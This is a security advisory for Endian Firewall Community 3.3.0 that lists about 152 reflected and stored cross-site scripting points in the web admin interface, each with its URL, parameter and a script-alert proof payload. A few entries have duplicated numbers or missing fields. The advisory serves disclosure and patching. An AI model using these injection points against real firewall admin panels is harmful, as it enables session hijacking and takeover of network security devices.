Endian Firewall Community release 3.3.0 Cross Site Scripting

2019.01.25
Credit: Ozer Goker
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################################################################################################## # Exploit Title: Endian Firewall Community release 3.3.0 | Cross-Site Scripting # Date: 24.01.2019 # Exploit Author: Ozer Goker # Vendor Homepage: https://www.endian.com # Software Link: https://sourceforge.net/projects/efw/files/Development/EFW-3.3.0/ # Version: 3.3.0 ################################################################################################################################## Introduction Endian Firewall Community (EFW) is a turn-key Linux based security software product designed for home that can transform any unused hardware appliance into a full-featured Unified Threat Management (UTM) solution. Endian Community is designed to make security simple and help protect home networks by using the power of Open Source. ################################################################################# XSS details: Reflected & Stored ################################################################################# XSS1 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER DISPLAY_GREEN_ADDRESS PAYLOAD <script>alert(1)</script> ################################################################################# XSS2 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER DISPLAY_GREEN_NETMASK PAYLOAD <script>alert(2)</script> ################################################################################# XSS3 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER DISPLAY_GREEN_ADDITIONAL PAYLOAD <script>alert(3)</script> ################################################################################# XSS4 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER MTU PAYLOAD <script>alert(4)</script> ################################################################################# XSS5 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER MAC PAYLOAD <script>alert(5)</script> ################################################################################# XSS6 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER MAIN_ADMINMAIL PAYLOAD <script>alert(6)</script> ################################################################################# XSS7 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER MAIN_MAILFROM PAYLOAD <script>alert(7)</script> ################################################################################# XSS8 | Reflected URL https://192.168.2.200:10443/cgi-bin/netwizard.cgi METHOD Post PARAMETER MAIN_SMARTHOST PAYLOAD <script>alert(8)</script> ################################################################################# XSS9 | Stored URL https://192.168.2.200:10443/manage/notifications/ METHOD Post PARAMETER SMARTHOST_ADDRESS PAYLOAD "><script>alert(9)</script> ################################################################################# XSS10 | Stored URL https://192.168.2.200:10443/manage/notifications/ METHOD Post PARAMETER SMARTHOST_USERNAME PAYLOAD "><script>alert(10)</script> ################################################################################# XSS11 | Stored URL https://192.168.2.200:10443/manage/password/web/?ACTION=edit&CONTROLLERNAME=&ID=2 METHOD Post PARAMETER remark PAYLOAD "><script>alert(11)</script> ################################################################################# XSS12 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_name PAYLOAD "><script>alert(12)</script> ################################################################################# XSS13 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_email PAYLOAD "><script>alert(13)</script> ################################################################################# XSS14 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_ou PAYLOAD "><script>alert(14)</script> ################################################################################# XSS15 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_city PAYLOAD "><script>alert(15)</script> ################################################################################# XSS16 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_state PAYLOAD "><script>alert(16)</script> ################################################################################# XSS17 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER new_cert_days PAYLOAD "><script>alert(17)</script> ################################################################################# XSS18 | Reflected URL https://192.168.2.200:10443/manage/gui/ METHOD Post PARAMETER upload_cert_req_days PAYLOAD "><script>alert(18)</script> ################################################################################# XSS19 | Reflected URL https://192.168.2.200:10443/cgi-bin/backupschedule.cgi METHOD Post PARAMETER BACKUP_RCPTTO PAYLOAD "><script>alert(19)</script> ################################################################################# XSS20 | Reflected URL https://192.168.2.200:10443/cgi-bin/backupschedule.cgi METHOD Post PARAMETER BACKUP_MAILFROM PAYLOAD "><script>alert(20)</script> ################################################################################# XSS21 | Reflected URL https://192.168.2.200:10443/cgi-bin/backupschedule.cgi METHOD Post PARAMETER BACKUP_SMARTHOST PAYLOAD "><script>alert(21)</script> ################################################################################# XSS22 | Stored URL https://192.168.2.200:10443/manage/dnsmasq/hosts/?ACTION=edit&CONTROLLERNAME=hosts&ID=1 METHOD Post PARAMETER remark PAYLOAD "><script>alert(22)</script> ################################################################################# XSS23 | Reflected URL https://192.168.2.200:10443/cgi-bin/routing.cgi METHOD Post PARAMETER source PAYLOAD "><script>alert(23)</script> ################################################################################# XSS24 | Reflected URL https://192.168.2.200:10443/cgi-bin/routing.cgi METHOD Post PARAMETER destination PAYLOAD "><script>alert(24)</script> ################################################################################# XSS25 | Reflected URL METHOD PARAMETER PAYLOAD "><script>alert(25)</script> ################################################################################# XSS26 | Reflected URL https://192.168.2.200:10443/cgi-bin/policy_routing.cgi METHOD Post PARAMETER source PAYLOAD "><script>alert(26)</script> ################################################################################# XSS27 | Reflected URL https://192.168.2.200:10443/cgi-bin/policy_routing.cgi METHOD Post PARAMETER destination PAYLOAD "><script>alert(27)</script> ################################################################################# XSS28 | Reflected URL https://192.168.2.200:10443/cgi-bin/policy_routing.cgi METHOD Post PARAMETER port PAYLOAD "><script>alert(28)</script> ################################################################################# XSS29 | Stored URL https://192.168.2.200:10443/cgi-bin/uplinkeditor.cgi METHOD Post PARAMETER NAME PAYLOAD "><script>alert(29)</script> ################################################################################# XSS30 | Reflected URL https://192.168.2.200:10443/cgi-bin/vlanconfig.cgi METHOD Post PARAMETER DEVICE PAYLOAD "><script>alert(30)</script> ################################################################################# XSS31 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DEFAULT_LEASE_TIME_GREEN PAYLOAD "><script>alert(31)</script> ################################################################################# XSS32 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER MAX_LEASE_TIME_GREEN PAYLOAD "><script>alert(32)</script> ################################################################################# XSS33 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DOMAIN_NAME_GREEN PAYLOAD "><script>alert(33)</script> ################################################################################# XSS34 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DEFAULT_LEASE_TIME_ORANGE PAYLOAD "><script>alert(34)</script> ################################################################################# XSS35 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER MAX_LEASE_TIME_ORANGE PAYLOAD "><script>alert(35)</script> ################################################################################# XSS36 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DOMAIN_NAME_ORANGE PAYLOAD "><script>alert(36)</script> ################################################################################# XSS37 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DEFAULT_LEASE_TIME_BLUE PAYLOAD "><script>alert(37)</script> ################################################################################# XSS38 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER MAX_LEASE_TIME_BLUE PAYLOAD "><script>alert(38)</script> ################################################################################# XSS39 | Stored URL https://192.168.2.200:10443/manage/dhcp/settings/ METHOD Post PARAMETER DOMAIN_NAME_BLUE PAYLOAD "><script>alert(39)</script> ################################################################################# XSS40 | Reflected URL https://192.168.2.200:10443/manage/dhcp/fixed_leases/ METHOD Post PARAMETER remark PAYLOAD "><script>alert(40)</script> ################################################################################# XSS41 | Reflected URL https://192.168.2.200:10443/manage/dhcp/fixed_leases/ METHOD Post PARAMETER filename PAYLOAD "><script>alert(41)</script> ################################################################################# XSS42 | Reflected URL https://192.168.2.200:10443/manage/dhcp/fixed_leases/ METHOD Post PARAMETER root_path PAYLOAD "><script>alert(42)</script> ################################################################################# XSS43 | Reflected URL https://192.168.2.200:10443/cgi-bin/time.cgi METHOD Post PARAMETER NTP_SERVER_LIST PAYLOAD "><script>alert(43)</script> ################################################################################# XSS44 | Stored URL https://192.168.2.200:10443/cgi-bin/salearn.cgi METHOD Post PARAMETER remark PAYLOAD "><script>alert(44)</script> ################################################################################# XSS45 | Stored URL https://192.168.2.200:10443/cgi-bin/salearn.cgi METHOD Post PARAMETER host PAYLOAD "><script>alert(45)</script> ################################################################################# XSS46 | Stored URL https://192.168.2.200:10443/cgi-bin/salearn.cgi METHOD Post PARAMETER user PAYLOAD "><script>alert(46)</script> ################################################################################# XSS3 | Stored URL https://192.168.2.200:10443/cgi-bin/salearn.cgi METHOD Post PARAMETER ham PAYLOAD "><script>alert(47)</script> ################################################################################# XSS48 | Stored URL https://192.168.2.200:10443/cgi-bin/salearn.cgi METHOD Post PARAMETER spam PAYLOAD "><script>alert(48)</script> ################################################################################# XSS49 | Reflected URL https://192.168.2.200:10443/manage/qos/devices/ METHOD Post PARAMETER device PAYLOAD "><script>alert(49)</script> ################################################################################# XSS50 | Reflected URL https://192.168.2.200:10443/manage/qos/classes/ METHOD Post PARAMETER name PAYLOAD "><script>alert(50)</script> ################################################################################# XSS51 | Reflected URL https://192.168.2.200:10443/manage/qos/rules/ METHOD Post PARAMETER protocol PAYLOAD "><script>alert(51)</script> ################################################################################# XSS52 | Reflected URL https://192.168.2.200:10443/manage/qos/rules/ METHOD Post PARAMETER dscp PAYLOAD "><script>alert(52)</script> ################################################################################# XSS53 | Reflected URL https://192.168.2.200:10443/manage/qos/rules/ METHOD Post PARAMETER comment PAYLOAD "><script>alert(53)</script> ################################################################################# XSS54 | Reflected URL https://192.168.2.200:10443/cgi-bin/dnat.cgi METHOD Post PARAMETER target_ip_ip PAYLOAD "><script>alert(54)</script> ################################################################################# XSS55 | Reflected URL https://192.168.2.200:10443/cgi-bin/snat.cgi METHOD Post PARAMETER source PAYLOAD "><script>alert(55)</script> ################################################################################# XSS56 | Reflected URL https://192.168.2.200:10443/cgi-bin/snat.cgi METHOD Post PARAMETER snat_to_ip PAYLOAD "><script>alert(56)</script> ################################################################################# XSS57 | Stored URL https://192.168.2.200:10443/cgi-bin/incoming.cgi METHOD Post PARAMETER destination PAYLOAD "><script>alert(57)</script> ################################################################################# XSS58 | Reflected URL https://192.168.2.200:10443/cgi-bin/incoming.cgi METHOD Post PARAMETER target PAYLOAD "><script>alert(58)</script> ################################################################################# XSS59 | Stored URL https://192.168.2.200:10443/cgi-bin/incoming.cgi METHOD Post PARAMETER remark PAYLOAD "><script>alert(59)</script> ################################################################################# XSS60 | Reflected URL https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi METHOD Post PARAMETER target PAYLOAD "><script>alert(60)</script> ################################################################################# XSS61 | Stored URL https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi METHOD Post PARAMETER remark PAYLOAD "><script>alert(61)</script> ################################################################################# XSS62 | Reflected URL https://192.168.2.200:10443/cgi-bin/zonefw.cgi METHOD Post PARAMETER target PAYLOAD "><script>alert(62)</script> ################################################################################# XSS63 | Stored URL https://192.168.2.200:10443/cgi-bin/zonefw.cgi METHOD Post PARAMETER remark PAYLOAD "><script>alert(63)</script> ################################################################################# XSS64 | Reflected URL https://192.168.2.200:10443/cgi-bin/vpnfw.cgi METHOD Post PARAMETER source PAYLOAD "><script>alert(64)</script> ################################################################################# XSS65 | Reflected URL https://192.168.2.200:10443/cgi-bin/vpnfw.cgi METHOD Post PARAMETER target PAYLOAD "><script>alert(65)</script> ################################################################################# XSS66 | Stored URL https://192.168.2.200:10443/cgi-bin/vpnfw.cgi METHOD Post PARAMETER remark PAYLOAD "><script>alert(66)</script> ################################################################################# XSS67 | Reflected URL https://192.168.2.200:10443/cgi-bin/xtaccess.cgi METHOD Post PARAMETER target PAYLOAD "><script>alert(67)</script> ################################################################################# XSS68 | Stored URL https://192.168.2.200:10443/cgi-bin/xtaccess.cgi METHOD Post PARAMETER remark PAYLOAD "><script>alert(68)</script> ################################################################################# XSS69 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER PROXY_PORT PAYLOAD "><script>alert(69)</script> ################################################################################# XSS70 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER VISIBLE_HOSTNAME PAYLOAD "><script>alert(70)</script> ################################################################################# XSS71 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER ADMIN_MAIL_ADDRESS PAYLOAD "><script>alert(71)</script> ################################################################################# XSS72 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER BYPASS_SOURCE PAYLOAD "><script>alert(72)</script> ################################################################################# XSS73 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER BYPASS_DESTINATION PAYLOAD "><script>alert(73)</script> ################################################################################# XSS74 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER CACHE_SIZE PAYLOAD "><script>alert(74)</script> ################################################################################# XSS75 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER CACHE_MEM PAYLOAD "><script>alert(75)</script> ################################################################################# XSS76 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER MAX_SIZE PAYLOAD "><script>alert(76)</script> ################################################################################# XSS77 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi METHOD Post PARAMETER DST_NOCACHE PAYLOAD "><script>alert(77)</script> ################################################################################# XSS78 | Stored URL https://192.168.2.200:10443/cgi-bin/proxypolicy.cgi METHOD Post PARAMETER filtertype PAYLOAD "><script>alert(78)</script> ################################################################################# XSS79 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyauth.cgi METHOD Post PARAMETER AUTH_CHILDREN PAYLOAD "><script>alert(79)</script> ################################################################################# XSS80 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyauth.cgi METHOD Post PARAMETER AUTH_MAX_USERIP PAYLOAD "><script>alert(80)</script> ################################################################################# XSS81 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyauth.cgi METHOD Post PARAMETER AUTH_CACHE_TTL PAYLOAD "><script>alert(81)</script> ################################################################################# XSS82 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyauth.cgi METHOD Post PARAMETER AUTH_IPCACHE_TTL PAYLOAD "><script>alert(82)</script> ################################################################################# XSS83 | Reflected URL https://192.168.2.200:10443/cgi-bin/proxyauth.cgi METHOD Post PARAMETER NCSA_MIN_PASS_LEN PAYLOAD "><script>alert(83)</script> ################################################################################# XSS84 | Reflected URL https://192.168.2.200:10443/manage/proxy/adjoin/ METHOD Post PARAMETER ADMIN_USER PAYLOAD "><script>alert(84)</script> ################################################################################# XSS85 | Reflected URL https://192.168.2.200:10443/cgi-bin/frox.cgi METHOD Post PARAMETER TRANSPARENT_SOURCE_BYPASS PAYLOAD "><script>alert(85)</script> ################################################################################# XSS86 | Reflected URL https://192.168.2.200:10443/cgi-bin/frox.cgi METHOD Post PARAMETER TRANSPARENT_DESTINATION_BYPASS PAYLOAD "><script>alert(86)</script> ################################################################################# XSS87 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi METHOD Post PARAMETER VIRUS_ADMIN PAYLOAD "><script>alert(87)</script> ################################################################################# XSS88 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi METHOD Post PARAMETER NOTIFICATION_SENDER PAYLOAD "><script>alert(88)</script> ################################################################################# XSS89 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi METHOD Post PARAMETER BYPASS_SOURCE PAYLOAD "><script>alert(89)</script> ################################################################################# XSS90 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi METHOD Post PARAMETER BYPASS_DESTINATION PAYLOAD "><script>alert(90)</script> ################################################################################# XSS91 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER SENDER_WHITELIST PAYLOAD "><script>alert(91)</script> ################################################################################# XSS92 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER RECIPIENT_WHITELIST PAYLOAD "><script>alert(92)</script> ################################################################################# XSS93 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER CLIENT_WHITELIST PAYLOAD "><script>alert(93)</script> ################################################################################# XSS94 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER SENDER_BLACKLIST PAYLOAD "><script>alert(94)</script> ################################################################################# XSS95 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER RECIPIENT_BLACKLIST PAYLOAD "><script>alert(95)</script> ################################################################################# XSS96 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER CLIENT_BLACKLIST PAYLOAD "><script>alert(96)</script> ################################################################################# XSS97 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER WHITELIST_RECIPIENT PAYLOAD "><script>alert(97)</script> ################################################################################# XSS98 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER WHITELIST_CLIENT PAYLOAD "><script>alert(98)</script> ################################################################################# XSS99 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER SPAM_WHITELIST PAYLOAD "><script>alert(99)</script> ################################################################################# XSS100 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtplists.cgi METHOD Post PARAMETER SPAM_BLACKLIST PAYLOAD "><script>alert(100)</script> ################################################################################# XSS101 | Stored URL https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi METHOD Post PARAMETER DOMAIN PAYLOAD "><script>alert(101)</script> ################################################################################# XSS102 | Stored URL https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi METHOD Post PARAMETER SERVER PAYLOAD "><script>alert(102)</script> ################################################################################# XSS103 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/domainrouting/ METHOD Post PARAMETER domain PAYLOAD "><script>alert(103)</script> ################################################################################# XSS104 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/domainrouting/ METHOD Post PARAMETER smarthost_address PAYLOAD "><script>alert(104)</script> ################################################################################# XSS105 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/domainrouting/ METHOD Post PARAMETER smarthost_username PAYLOAD "><script>alert(105)</script> ################################################################################# XSS106 | Stored URL https://192.168.2.200:10443/cgi-bin/smtprouting.cgi METHOD Post PARAMETER ADDRESS PAYLOAD "><script>alert(106)</script> ################################################################################# XSS107 | Reflected URL https://192.168.2.200:10443/cgi-bin/smtprouting.cgi METHOD Post PARAMETER BCC PAYLOAD "><script>alert(107)</script> ################################################################################# XSS108 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER SMARTHOST_USERNAME PAYLOAD "><script>alert(108)</script> ################################################################################# XSS109 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER AUTH_DAEMONS PAYLOAD "><script>alert(109)</script> ################################################################################# XSS110 | Stored URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER IMAP_AUTH_SERVER PAYLOAD ################################################################################# XSS111 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER SMTP_HELO_NAME PAYLOAD "><script>alert(111)</script> ################################################################################# XSS112 | Stored URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER ALWAYS_BCC_ADDRESS PAYLOAD "><script>alert(112)</script> ################################################################################# XSS113 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER MAILTEMPLATE_LANGUAGE PAYLOAD "><script>alert(113)</script> ################################################################################# XSS114 | Reflected URL https://192.168.2.200:10443/manage/smtpscan/advanced/ METHOD Post PARAMETER SMTPD_HARD_ERROR_LIMIT PAYLOAD "><script>alert(114)</script> ################################################################################# XSS115 | Reflected URL https://192.168.2.200:10443/manage/dnsmasq/localdomains/ METHOD Post PARAMETER remark PAYLOAD "><script>alert(115)</script> ################################################################################# XSS116 | Reflected URL https://192.168.2.200:10443/manage/openvpn/ METHOD Post PARAMETER reneg_sec PAYLOAD "><script>alert(116)</script> ################################################################################# XSS55 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER remark PAYLOAD "><script>alert(117)</script> ################################################################################# XSS118 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER secret PAYLOAD "><script>alert(118)</script> ################################################################################# XSS119 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_name PAYLOAD "><script>alert(119)</script> ################################################################################# XSS120 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_email PAYLOAD "><script>alert(120)</script> ################################################################################# XSS121 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_ou PAYLOAD "><script>alert(121)</script> ################################################################################# XSS122 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_organization PAYLOAD "><script>alert(122)</script> ################################################################################# XSS123 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_city PAYLOAD "><script>alert(123)</script> ################################################################################# XSS124 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_state PAYLOAD "><script>alert(124)</script> ################################################################################# XSS125 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER new_cert_days PAYLOAD "><script>alert(125)</script> ################################################################################# XSS126 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER upload_cert_req_days PAYLOAD "><script>alert(126)</script> ################################################################################# XSS127 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER local_peerid PAYLOAD "><script>alert(127)</script> ################################################################################# XSS128 | Reflected URL https://192.168.2.200:10443/manage/ipsec/ METHOD Post PARAMETER remote_peerid PAYLOAD "><script>alert(128)</script> ################################################################################# XSS129 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER name PAYLOAD "><script>alert(129)</script> ################################################################################# XSS130 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER remark PAYLOAD "><script>alert(130)</script> ################################################################################# XSS131 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER new_cert_days PAYLOAD "><script>alert(131)</script> ################################################################################# XSS132 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER upload_cert_req_days PAYLOAD "><script>alert(132)</script> ################################################################################# XSS133 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER user_department PAYLOAD "><script>alert(133)</script> ################################################################################# XSS134 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER user_organization PAYLOAD "><script>alert(134)</script> ################################################################################# XSS135 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER user_city PAYLOAD "><script>alert(135)</script> ################################################################################# XSS136 | Reflected URL https://192.168.2.200:10443/manage/vpnauthentication/user/ METHOD Post PARAMETER user_state PAYLOAD "><script>alert(136)</script> ################################################################################# XSS137 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER new_cert_name PAYLOAD "><script>alert(137)</script> ################################################################################# XSS138 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER new_cert_ou PAYLOAD "><script>alert(138)</script> ################################################################################# XSS139 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER new_cert_organization PAYLOAD "><script>alert(139)</script> ################################################################################# XSS140 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER new_cert_city PAYLOAD "><script>alert(140)</script> ################################################################################# XSS141 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER new_cert_state PAYLOAD "><script>alert(141)</script> ################################################################################# XSS142 | Reflected URL https://192.168.2.200:10443/manage/ca/certificate/ METHOD Post PARAMETER upload_cert_req_days PAYLOAD "><script>alert(142)</script> ################################################################################# XSS143 | Stored URL https://192.168.2.200:10443/cgi-bin/logs_log.cgi METHOD Post PARAMETER DATE PAYLOAD "><script>alert(143)</script> ################################################################################# XSS144 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_log.cgi METHOD Post PARAMETER OFFSET PAYLOAD "><script>alert(144)</script> ################################################################################# XSS145 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_ids.cgi METHOD Post PARAMETER DATE PAYLOAD "><script>alert(145)</script> ################################################################################# XSS146 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_openvpn.cgi METHOD Post PARAMETER DATE PAYLOAD "><script>alert(146)</script> ################################################################################# XSS147 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_clamav.cgi METHOD Post PARAMETER DATE PAYLOAD "><script>alert(147)</script> ################################################################################# XSS148 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi METHOD Post PARAMETER DATE PAYLOAD "><script>alert(148)</script> ################################################################################# XSS149 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi METHOD Post PARAMETER OFFSET PAYLOAD "><script>alert(148)</script> ################################################################################# XSS149 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_proxy.cgi METHOD Post PARAMETER DATE PAYLOAD "><script>alert(149)</script> ################################################################################# XSS150 | Reflected URL https://192.168.2.200:10443/cgi-bin/logs_smtp.cgi METHOD Post PARAMETER DATE PAYLOAD "><script>alert(150)</script> ################################################################################# XSS151 | Stored URL https://192.168.2.200:10443/manage/opentsa/ METHOD Post PARAMETER HTTP_USERNAME PAYLOAD "><script>alert(151)</script> ################################################################################# XSS152 | Stored URL https://192.168.2.200:10443/manage/opentsa/ METHOD Post PARAMETER HTTP_PASSWORD PAYLOAD "><script>alert(152)</script> #################################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top